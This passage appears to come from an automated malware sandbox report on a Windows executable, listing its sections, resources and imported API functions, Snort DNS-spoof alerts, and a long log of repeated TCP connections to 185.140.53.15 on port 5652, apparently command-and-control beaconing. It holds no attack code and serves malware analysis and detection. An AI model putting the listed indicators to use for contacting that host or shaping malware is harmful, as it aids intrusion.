                            ...... | 0x84000 | 0x7230 | 0x7400 | False | 0.623013200431 | data | 6.65937740819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            ..... | 0x8c000 | 0x72fc2 | 0x73000 | False | 0.558258322011 | data | 6.93563526848 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            Name | RVA | Size | Type | Language | Country
                            TMAP | 0x8caf4 | 0x197eb | ASCII text, with very long lines, with CRLF line terminators | English | United States
                            RT_CURSOR | 0xa62e0 | 0x134 | data | English | United States
                            RT_CURSOR | 0xa6414 | 0x134 | data | English | United States
                            RT_CURSOR | 0xa6548 | 0x134 | data | English | United States
                            RT_CURSOR | 0xa667c | 0x134 | data | English | United States
                            RT_CURSOR | 0xa67b0 | 0x134 | data | English | United States
                            RT_CURSOR | 0xa68e4 | 0x134 | data | English | United States
                            RT_CURSOR | 0xa6a18 | 0x134 | data | English | United States
                            RT_BITMAP | 0xa6b4c | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa6d1c | 0x1e4 | data | English | United States
                            RT_BITMAP | 0xa6f00 | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa70d0 | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa72a0 | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa7470 | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa7640 | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa7810 | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa79e0 | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa7bb0 | 0x1d0 | data | English | United States
                            RT_BITMAP | 0xa7d80 | 0x506e0 | data | English | United States
                            RT_BITMAP | 0xf8460 | 0xe8 | GLS_BINARY_LSB_FIRST | English | United States
                            RT_ICON | 0xf8548 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                            RT_ICON | 0xf89b0 | 0x988 | data | English | United States
                            RT_ICON | 0xf9338 | 0x10a8 | data | English | United States
                            RT_ICON | 0xfa3e0 | 0x25a8 | data | English | United States
                            RT_DIALOG | 0xfc988 | 0x52 | data | |
                            RT_DIALOG | 0xfc9dc | 0x52 | data | |
                            RT_STRING | 0xfca30 | 0x148 | data | |
                            RT_STRING | 0xfcb78 | 0x390 | data | |
                            RT_STRING | 0xfcf08 | 0x1a4 | data | |
                            RT_STRING | 0xfd0ac | 0xc8 | data | |
                            RT_STRING | 0xfd174 | 0x118 | data | |
                            RT_STRING | 0xfd28c | 0x39c | data | |
                            RT_STRING | 0xfd628 | 0x390 | data | |
                            RT_STRING | 0xfd9b8 | 0x370 | data | |
                            RT_STRING | 0xfdd28 | 0x3cc | data | |
                            RT_STRING | 0xfe0f4 | 0x214 | data | |
                            RT_STRING | 0xfe308 | 0xcc | data | |
                            RT_STRING | 0xfe3d4 | 0x194 | data | |
                            RT_STRING | 0xfe568 | 0x3c4 | data | |
                            RT_STRING | 0xfe92c | 0x338 | data | |
                            RT_STRING | 0xfec64 | 0x294 | data | |
                            RT_GROUP_CURSOR | 0xfeef8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                            RT_GROUP_CURSOR | 0xfef0c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                            RT_GROUP_CURSOR | 0xfef20 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                            RT_GROUP_CURSOR | 0xfef34 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                            RT_GROUP_CURSOR | 0xfef48 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                            RT_GROUP_CURSOR | 0xfef5c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                            RT_GROUP_CURSOR | 0xfef70 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                            RT_GROUP_ICON | 0xfef84 | 0x3e | data | English | United States

                            Imports

                            DLL | Import
                            oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
                            advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                            user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                            kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                            kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                            user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                            gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
                            version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                            kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                            advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                            oleaut32.dll | GetErrorInfo, SysFreeString
                            ole32.dll | CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                            kernel32.dll | Sleep
                            oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                            comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                            URL | InetIsOffline

                            Possible Origin

                            Language of compilation system | Country where language is spoken | Map
                            English | United States |

                            Network Behavior

                            Snort IDS Alerts

                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                            09/27/21-20:40:26.090744 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 49910 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:40:28.212397 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 64549 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:40:47.445765 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 61721 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:40:49.554492 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 51255 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:40:52.234039 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 61522 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:41:03.235649 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 59794 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:41:17.924951 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 53418 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:41:30.956044 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 51275 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:41:33.111673 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 63492 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:41:39.455292 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 57091 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:41:43.690538 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 54450 | 8.8.8.8 | 192.168.2.4

                            Network Port Distribution

                            TCP Packets

                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Sep 27, 2021 20:40:26.099253893 CEST | 49771 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:26.126665115 CEST | 5652 | 49771 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:26.633711100 CEST | 49771 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:26.662739038 CEST | 5652 | 49771 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:27.162794113 CEST | 49771 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:27.188055992 CEST | 5652 | 49771 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:28.213025093 CEST | 49774 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:28.239039898 CEST | 5652 | 49774 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:28.740093946 CEST | 49774 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:28.767437935 CEST | 5652 | 49774 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:29.266966105 CEST | 49774 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:29.292431116 CEST | 5652 | 49774 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:30.311638117 CEST | 49775 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:30.337019920 CEST | 5652 | 49775 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:30.847476959 CEST | 49775 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:30.873163939 CEST | 5652 | 49775 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:31.382426977 CEST | 49775 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:31.408561945 CEST | 5652 | 49775 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:32.568515062 CEST | 49776 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:32.593892097 CEST | 5652 | 49776 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:33.097670078 CEST | 49776 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:33.122795105 CEST | 5652 | 49776 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:33.629543066 CEST | 49776 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:33.654998064 CEST | 5652 | 49776 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:35.528153896 CEST | 49777 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:35.553522110 CEST | 5652 | 49777 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:36.104592085 CEST | 49777 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:36.129878044 CEST | 5652 | 49777 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:36.704710960 CEST | 49777 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:36.730668068 CEST | 5652 | 49777 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:37.749738932 CEST | 49782 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:37.775094986 CEST | 5652 | 49782 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:38.275748014 CEST | 49782 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:38.302005053 CEST | 5652 | 49782 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:38.806431055 CEST | 49782 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:38.833870888 CEST | 5652 | 49782 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:39.854981899 CEST | 49783 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:39.880990028 CEST | 5652 | 49783 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:40.382126093 CEST | 49783 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:46.383398056 CEST | 49783 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:46.409064054 CEST | 5652 | 49783 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:47.448198080 CEST | 49790 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:47.475070000 CEST | 5652 | 49790 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:47.975523949 CEST | 49790 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:48.000745058 CEST | 5652 | 49790 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:48.500801086 CEST | 49790 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:48.526865005 CEST | 5652 | 49790 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:49.562388897 CEST | 49792 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:49.588556051 CEST | 5652 | 49792 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:50.090642929 CEST | 49792 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:50.116292953 CEST | 5652 | 49792 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:50.620203018 CEST | 49792 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:50.645873070 CEST | 5652 | 49792 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:52.249577045 CEST | 49793 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:52.275001049 CEST | 5652 | 49793 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:52.867918015 CEST | 49793 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:52.895874977 CEST | 5652 | 49793 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:53.468501091 CEST | 49793 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:53.495196104 CEST | 5652 | 49793 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:54.516490936 CEST | 49794 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:54.542279959 CEST | 5652 | 49794 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:55.076044083 CEST | 49794 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:55.101849079 CEST | 5652 | 49794 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:55.676054955 CEST | 49794 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:55.701675892 CEST | 5652 | 49794 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:56.810127020 CEST | 49796 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:56.836287975 CEST | 5652 | 49796 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:57.367189884 CEST | 49796 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:57.392453909 CEST | 5652 | 49796 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:57.967570066 CEST | 49796 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:57.994271994 CEST | 5652 | 49796 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:59.016191959 CEST | 49809 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:59.042155027 CEST | 5652 | 49809 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:40:59.542375088 CEST | 49809 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:40:59.568694115 CEST | 5652 | 49809 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:00.069375992 CEST | 49809 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:00.096935987 CEST | 5652 | 49809 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:01.115319967 CEST | 49814 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:01.140680075 CEST | 5652 | 49814 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:01.643546104 CEST | 49814 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:01.668754101 CEST | 5652 | 49814 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:02.169558048 CEST | 49814 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:02.195699930 CEST | 5652 | 49814 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:03.238528013 CEST | 49818 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:03.264319897 CEST | 5652 | 49818 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:03.855710983 CEST | 49818 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:03.881481886 CEST | 5652 | 49818 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:04.455780983 CEST | 49818 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:04.481502056 CEST | 5652 | 49818 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:05.535041094 CEST | 49821 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:05.563955069 CEST | 5652 | 49821 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:06.155870914 CEST | 49821 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:06.181652069 CEST | 5652 | 49821 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:06.755912066 CEST | 49821 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:06.782246113 CEST | 5652 | 49821 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:07.804713011 CEST | 49822 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:07.830929995 CEST | 5652 | 49822 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:08.465043068 CEST | 49822 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:08.491796970 CEST | 5652 | 49822 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:09.067141056 CEST | 49822 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:09.093024969 CEST | 5652 | 49822 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:11.281912088 CEST | 49823 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:11.307770967 CEST | 5652 | 49823 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:11.856374025 CEST | 49823 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:11.882030010 CEST | 5652 | 49823 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:12.456403971 CEST | 49823 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:12.481872082 CEST | 5652 | 49823 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:13.500864983 CEST | 49829 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:13.528048038 CEST | 5652 | 49829 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:14.056458950 CEST | 49829 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:14.082390070 CEST | 5652 | 49829 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:14.656506062 CEST | 49829 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:14.686913967 CEST | 5652 | 49829 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:15.709825039 CEST | 49831 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:15.735502005 CEST | 5652 | 49831 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:16.256684065 CEST | 49831 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:16.282218933 CEST | 5652 | 49831 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:16.856717110 CEST | 49831 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:16.882626057 CEST | 5652 | 49831 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:17.925641060 CEST | 49836 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:17.950985909 CEST | 5652 | 49836 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:18.456785917 CEST | 49836 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:18.483309984 CEST | 5652 | 49836 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:19.056817055 CEST | 49836 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:19.083744049 CEST | 5652 | 49836 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:20.110378981 CEST | 49841 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:20.141074896 CEST | 5652 | 49841 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:20.646934986 CEST | 49841 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:20.672533035 CEST | 5652 | 49841 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:21.173989058 CEST | 49841 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:21.199476004 CEST | 5652 | 49841 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:22.219979048 CEST | 49842 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:22.245400906 CEST | 5652 | 49842 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:22.749006987 CEST | 49842 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:22.774339914 CEST | 5652 | 49842 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:23.288388014 CEST | 49842 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:23.318268061 CEST | 5652 | 49842 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:24.337033033 CEST | 49843 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:24.363328934 CEST | 5652 | 49843 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:24.866652966 CEST | 49843 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:24.892354012 CEST | 5652 | 49843 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:25.397974968 CEST | 49843 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:25.424838066 CEST | 5652 | 49843 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:26.454720020 CEST | 49844 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:26.481374025 CEST | 5652 | 49844 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:26.991803885 CEST | 49844 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:27.017288923 CEST | 5652 | 49844 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:27.523144960 CEST | 49844 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:27.549626112 CEST | 5652 | 49844 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:28.604499102 CEST | 49845 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:28.629947901 CEST | 5652 | 49845 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:29.135026932 CEST | 49845 | 5652 | 192.168.2.4 | 185.140.53.15
